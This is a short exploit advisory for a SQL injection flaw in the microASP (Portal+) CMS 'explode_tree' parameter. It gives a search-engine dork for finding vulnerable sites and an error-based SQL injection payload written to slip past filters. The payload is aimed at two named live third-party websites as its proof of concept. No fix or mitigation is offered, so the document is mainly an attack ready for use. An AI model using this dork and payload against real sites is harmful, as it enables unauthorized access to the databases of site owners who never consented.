microASP (Portal+) CMS SQL Injection

microASP (Portal+) CMS suffers from a remote SQL injection vulnerability.


MD5 | 46e26802b4ca022c2a8057232a023cb0

[+] Sql Injection on microASP (Portal+) CMS

[+] Date: 05/05/2019

[+] Risk: High

[+] CWE Number : CWE-89

[+] Author: Felipe Andrian Peixoto

[+] Vendor Homepage: http://www.microasp.it/

[+] Contact: [email protected]

[+] Tested on: Windows 7 and Gnu/Linux

[+] Dork: inurl:"/pagina.phtml?explode_tree" // use your brain ;)

[+] Exploit :

http://host/patch/pagina.phtml?explode_tree= [SQL Injection]

[+] PoC :

https://www.hedler.it/pagina.phtml?explode_tree=-1'/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/ database()),0x3a7333783075))--+-
https://www.camboitalia.it/pagina.phtml?explode_tree=-1%27/*!50000and*/+/*!50000extractvalue*/(0x0a,/*!50000concat*/(0x0a,0x73337830753a,(/*!50000select*/%20database()),0x3a7333783075))--+-

[+] EOF

Related Posts